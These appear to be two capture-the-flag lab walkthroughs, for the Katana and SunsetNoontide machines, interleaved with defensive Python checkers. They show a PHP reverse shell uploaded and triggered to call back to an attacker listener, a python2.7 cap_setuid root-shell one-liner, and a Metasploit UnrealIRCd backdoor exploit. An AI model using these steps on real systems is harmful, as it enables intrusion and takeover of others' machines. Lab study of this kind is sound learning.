pg-katana-play

Exploitation Guide for Katana

Summary

This machine is exploited by a file upload vulnerability in a web application. It is escalated by exploiting a misconfigured Linux file capability in the python2.7 binary.

Enumeration

Nmap

We start off by running an nmap scan:

kali@kali:~$ sudo nmap -p- 192.168.120.154
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-20 11:33 EDT
Nmap scan report for 192.168.120.154
Host is up (0.030s latency).
Not shown: 65527 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
3389/tcp open  ms-wbt-server
7080/tcp open  empowerid
8088/tcp open  radan-http
8715/tcp open  unknown
9198/tcp open  unknown

Dirb

Using dirb and the default wordlist, we are able to brute-force and discover upload.html on port 8088:

kali@kali:~$ dirb http://192.168.120.155:8088 -X .html -r

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Aug 20 14:05:14 2020
URL_BASE: http://192.168.120.155:8088/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive
EXTENSIONS_LIST: (.html) | (.html) [NUM = 1]

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.120.155:8088/ ----
+ http://192.168.120.155:8088/error404.html (CODE:200|SIZE:195)                                                
+ http://192.168.120.155:8088/index.html (CODE:200|SIZE:655)                                                   
+ http://192.168.120.155:8088/upload.html (CODE:200|SIZE:6480)                                                 
                                                                                                               
-----------------
END_TIME: Thu Aug 20 14:07:40 2020
DOWNLOADED: 4612 - FOUND: 3

Exploitation

File Upload Vulnerability

Navigating to http://192.168.120.155:8088/upload.html, we see a couple of file upload controls. We are able to upload the PHP reverse shell available at /usr/share/webshells/php/php-reverse-shell.php:

kali@kali:~$ locate php-reverse-shell.php
...
/usr/share/webshells/php/php-reverse-shell.php
...
kali@kali:~$

Set the local port to 4444 in the PHP reverse shell. We can choose either control for our upload. After selecting the prepared PHP reverse shell, click Submit Query. The following message appears:

Please wait for 1 minute!. Please relax!.

File : file1
Name :
Type :
Path :
Size : 0
Please wait for 1 minute!. Please relax!.

file is empty, not stored.

File : file2
Name : php-reverse-shell.php
Type : application/x-php
Path : /tmp/phpFjoLWh
Size : 5495
Please wait for 1 minute!. Please relax!.

Moved to other web server: /tmp/phpFjoLWh ====> /opt/manager/html/katana_php-reverse-shell.php
MD5 : 8783aa0d056e9e74e9d9856605d072a5
Size : 5495 bytes

The important part is this:

Moved to other web server: /tmp/phpFjoLWh ====> /opt/manager/html/katana_php-reverse-shell.php

First, start a netcat listener on port 4444. From the nmap scan, we saw an open port 8715. Using some guesswork and the above message, we can trigger the reverse shell by navigating to http://192.168.120.155:8715/katana_php-reverse-shell.php:

kali@kali:~$ nc -lvp 4444
listening on [any] 4444 ...
192.168.120.155: inverse host lookup failed: Unknown host
connect to [192.168.118.3] from (UNKNOWN) [192.168.120.155] 57806
Linux katana 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 GNU/Linux
 13:36:02 up 1 min,  0 users,  load average: 0.03, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@katana:/$
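As an added example (my own Python, not the machine's PHP application), here is the upload check the application above lacks: it rejects empty files as the app already does, but it also ignores the client's filename, extension and Content-Type, validates the bytes against a small allowlist, and stores the result under a random name in a directory no web server serves. STORE_DIR and the allowed formats are assumptions.

```python
import os
import secrets

# Assumed settings (not from the original page): a directory that no web server on the
# host serves, and the only formats the form legitimately needs, with their magic bytes.
STORE_DIR = "/var/lib/uploads"  # hypothetical; must not sit under any DocumentRoot
ALLOWED_MAGIC = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "pdf": b"%PDF-"}
MAX_SIZE = 2 * 1024 * 1024

def check_upload(filename, data):
    """Return (ok, detail): detail is the canonical extension on success and the
    rejection reason otherwise. Decides on the bytes received and the final
    extension only; the client-supplied Content-Type is never consulted."""
    if not data:
        return False, "file is empty, not stored"  # the app above gets this case right
    if len(data) > MAX_SIZE:
        return False, "file too large"
    base = os.path.basename(filename.replace("\\", "/"))
    if "." not in base:
        return False, "no extension"
    ext = base.rsplit(".", 1)[1].lower()
    ext = "jpg" if ext == "jpeg" else ext
    magic = ALLOWED_MAGIC.get(ext)
    if magic is None:  # .php, .phtml, .PHP and friends all stop here
        return False, "extension not allowed"
    if not data.startswith(magic):  # a PHP file renamed to .png fails here
        return False, "content does not match extension"
    return True, ext

def store_upload(filename, data, store_dir=STORE_DIR):
    """Validate, then write under a random name so the original name (and anything like
    katana_<name>.php derived from it) never reaches disk or a URL. Returns path or None."""
    ok, detail = check_upload(filename, data)
    if not ok:
        return None
    path = os.path.join(store_dir, "%s.%s" % (secrets.token_hex(16), detail))
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)  # no overwrite, no exec bit
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return path
```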

Escalation

Checking File Capabilities

Using getcap with the recursive flag from the root directory, we see that a file capability with the +ep (effective, permitted) flags is set on python2.7:

www-data@katana:~$ getcap -r / 2>/dev/null
getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.7 = cap_setuid+ep
www-data@katana:~$

Linux file capabilities are maintained by the kernel and are conceptually similar to SUID: the kernel's privilege checks for a thread are based on capabilities, which break the actions normally reserved for root down into smaller, separately grantable pieces. A file's capability sets are stored in an extended attribute named security.capability, and a binary that carries cap_setuid in its effective set can switch to UID 0 without being owned by root or marked SUID.

We are able to abuse the capabilities misconfiguration of python2.7 to drop ourselves into a root shell:

www-data@katana:~$ whoami
whoami
www-data
www-data@katana:~$ /usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'
<c 'import os; os.setuid(0); os.system("/bin/bash")'
root@katana:~# whoami
whoami
root
root@katana:~# 
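As an added example (not part of the original writeup), this Python script decodes the raw security.capability extended attribute described above and walks a filesystem the way getcap -r does, flagging entries such as the cap_setuid+ep on python2.7. The sample xattr bytes are constructed to match that entry, and ESCALATION_CAPS is my own selection.

```python
import os
import struct
# Capability bit numbers from linux/capability.h (tuple index = bit number).
CAP_NAMES = (
    "chown", "dac_override", "dac_read_search", "fowner", "fsetid", "kill", "setgid", "setuid",
    "setpcap", "linux_immutable", "net_bind_service", "net_broadcast", "net_admin", "net_raw",
    "ipc_lock", "ipc_owner", "sys_module", "sys_rawio", "sys_chroot", "sys_ptrace", "sys_pacct",
    "sys_admin", "sys_boot", "sys_nice", "sys_resource", "sys_time", "sys_tty_config", "mknod",
    "lease", "audit_write", "audit_control", "setfcap", "mac_override", "mac_admin", "syslog",
    "wake_alarm", "block_suspend", "audit_read", "perfmon", "bpf", "checkpoint_restore",
)
# Caps that give an unprivileged caller a direct path to root (my own selection, not exhaustive).
ESCALATION_CAPS = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
                   "cap_setfcap", "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module"}
VFS_CAP_REVISION_MASK, VFS_CAP_FLAGS_EFFECTIVE = 0xFF000000, 0x00000001
# Constructed sample for python2.7 = cap_setuid+ep: rev 2 magic + effective bit, CAP_SETUID (bit 7) permitted.
SAMPLE_PYTHON27_XATTR = struct.pack("<5I", 0x02000001, 1 << 7, 0, 0, 0)

def decode_vfs_caps(raw):
    """Decode a raw security.capability value into [(cap_name, '+flags')]. Layout is struct
    vfs_cap_data, little-endian u32s: magic_etc, then permitted/inheritable for bits 0-31 and 32-63."""
    magic, p_lo, i_lo, p_hi, i_hi = struct.unpack_from("<5I", raw)  # rev 3 adds a rootid; ignored
    if magic & VFS_CAP_REVISION_MASK not in (0x02000000, 0x03000000):
        raise ValueError("unsupported security.capability revision")
    permitted, inheritable = p_lo | (p_hi << 32), i_lo | (i_hi << 32)
    effective = bool(magic & VFS_CAP_FLAGS_EFFECTIVE)  # a single bit covers the whole set
    entries = []
    for bit, name in enumerate(CAP_NAMES):
        in_p, in_i = permitted >> bit & 1, inheritable >> bit & 1
        flags = ("e" if effective and in_p else "") + ("i" if in_i else "") + ("p" if in_p else "")
        if flags:
            entries.append(("cap_" + name, "+" + flags))
    return entries

def risky_entries(entries):
    """Entries worth a ticket: escalation caps that are both permitted and effective (+ep)."""
    return [e for e in entries if e[0] in ESCALATION_CAPS and "e" in e[1]]

def audit_file_caps(root="/"):
    """Walk root like `getcap -r` (Linux only); return [(path, getcap-style text, risky)]."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for path in (os.path.join(dirpath, f) for f in files):
            try:
                raw = os.getxattr(path, "security.capability", follow_symlinks=False)
            except OSError:  # no capability xattr on this file, or not readable by us
                continue
            entries = decode_vfs_caps(raw)
            findings.append((path, ",".join(n + f for n, f in entries), bool(risky_entries(entries))))
    return findings
```

On the Katana box, audit_file_caps("/") would report /usr/bin/python2.7 with risky=True and /usr/bin/ping with risky=False.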


Unattended way: brute-force SSH, and find katana in /root

pg-sunsetnoontide-play

Exploitation Guide for SunsetNoontide
Summary

This machine is exploited via a remote code execution vulnerability in the Unreal IRC server v3.2.8.1. It is then escalated by a very simple password for the root user.
Enumeration
Nmap

We start off by running an nmap scan:

kali@kali:~$ sudo nmap 192.168.187.120 
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-03 11:30 EST
Nmap scan report for 192.168.120.228
Host is up (0.035s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
6667/tcp open irc

IRC

This scan shows a potential IRC server running on port 6667. Let's connect to this IRC server to see if we can gather more information. We'll use irssi here, but any other IRC client will do.

kali@kali:~$ irssi

[(status)] /server connect 192.168.187.120

11:11 -!- Irssi: Looking up 192.168.187.120
11:11 -!- Irssi: Connecting to 192.168.187.120 [192.168.120.165] port 6667
11:11 -!- Irssi: Connection to 192.168.187.120 established
11:11 !irc.foonet.com *** Looking up your hostname...
11:11 !irc.foonet.com *** Couldn't resolve your hostname; using your IP address instead
11:11 -!- You have not registered
11:11 -!- Welcome to the ROXnet IRC Network kali!kali@192.168.118.9
11:11 -!- Your host is irc.foonet.com, running version Unreal3.2.8.1
11:11 -!- This server was created Sat 08 Aug EDT at 2020 07:03:52 PM
11:11 -!- irc.foonet.com Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
11:11 -!- UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 are supported by this server
11:11 -!- WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT
STATUSMSG=~&@%+ are supported by this server
11:11 -!- EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP are supported by this server
11:11 -!- There are 1 users and 0 invisible on 1 servers
11:11 -!- I have 1 clients and 0 servers
11:11 -!- Current Local Users: 1 Max: 1
11:11 -!- Current Global Users: 1 Max: 1
11:11 -!- MOTD File is missing
11:11 -!- Mode change [+iwx] for user kali`

We see that the IRC server is running Unreal version 3.2.8.1.
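As an added example (not part of the original writeup), a small Python check that registers with an IRC server the way irssi did above, pulls the version out of the 002/004 numerics, and reports whether it is the backdoored Unreal3.2.8.1 build. The raw sample lines are constructed from the irssi output above; the nick capaudit is an assumption.

```python
import re
import socket

# Server versions the writeup identifies as carrying the backdoor.
BACKDOORED_VERSIONS = {"Unreal3.2.8.1"}
# Constructed raw lines matching the irssi output above (002 = RPL_YOURHOST, 004 = RPL_MYINFO).
SAMPLE_REGISTRATION = [
    ":irc.foonet.com 002 kali :Your host is irc.foonet.com, running version Unreal3.2.8.1",
    ":irc.foonet.com 004 kali irc.foonet.com Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj",
]

def parse_irc_version(lines):
    """Server software string from the registration numerics (004 param 2, or 002 text), else None."""
    for line in lines:
        parts = line.strip().split(" ")
        if len(parts) < 4 or not parts[0].startswith(":"):
            continue
        if parts[1] == "004" and len(parts) > 4:
            return parts[4]
        if parts[1] == "002":
            m = re.search(r"running version (\S+)", line)
            if m:
                return m.group(1)
    return None

def assess_irc_server(lines):
    """(status, version) for the scan report; version is None when registration told us nothing."""
    version = parse_irc_version(lines)
    status = "unknown" if version is None else "backdoored" if version in BACKDOORED_VERSIONS else "ok"
    return status, version

def grab_irc_version(host, port=6667, timeout=5.0):
    """Register with a throwaway nick, answer the server's PING cookie, read until 004, then QUIT."""
    lines = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"NICK capaudit\r\nUSER capaudit 0 * :version check\r\n")
        try:
            for raw in s.makefile("rb"):
                line = raw.decode("utf-8", "replace").rstrip("\r\n")
                if line.startswith("PING "):  # Unreal pings a cookie before finishing registration
                    s.sendall(("PONG " + line[5:] + "\r\n").encode())
                lines.append(line)
                if " 004 " in line:
                    break
        except socket.timeout:  # server went quiet; report whatever we collected
            pass
        s.sendall(b"QUIT :done\r\n")
    return assess_irc_server(lines)
```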
Exploitation
Remote Code Execution

Looking up exploits for this version, we find that it is vulnerable to remote code execution:

kali@kali:~$ searchsploit "3.2.8.1"
--------------------------------------------------------------- -------------------------
 Exploit Title                                                 | Path
--------------------------------------------------------------- -------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)   | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow        | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute                 | linux/remote/13853.pl
--------------------------------------------------------------- -------------------------

We can use the Metasploit framework module unix/irc/unreal_ircd_3281_backdoor and the payload cmd/unix/reverse_perl to achieve RCE:

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.187.120  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   6667             yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads

Compatible Payloads
===================

   #   Name                                Disclosure Date  Rank    Check  Description
   -   ----                                ---------------  ----    -----  -----------
   0   cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   1   cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   2   cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
   3   cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   4   cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   5   cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   6   cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   7   cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   8   cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   9   cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   10  cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   11  cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload 0
payload => cmd/unix/bind_perl
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[*] 192.168.187.120:6667 - Connected to 192.168.187.120:6667...
:irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
[*] 192.168.187.120:6667 - Sending backdoor command...
[*] Started bind TCP handler against 192.168.187.120:4444
id
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.187.120:4444) at 2021-09-09 11:23:30 -0400

uid=1000(server) gid=1000(server) groups=1000(server),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
id
uid=1000(server) gid=1000(server) groups=1000(server),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
cd /home
su root
root
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux noontide 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
hostname
noontide

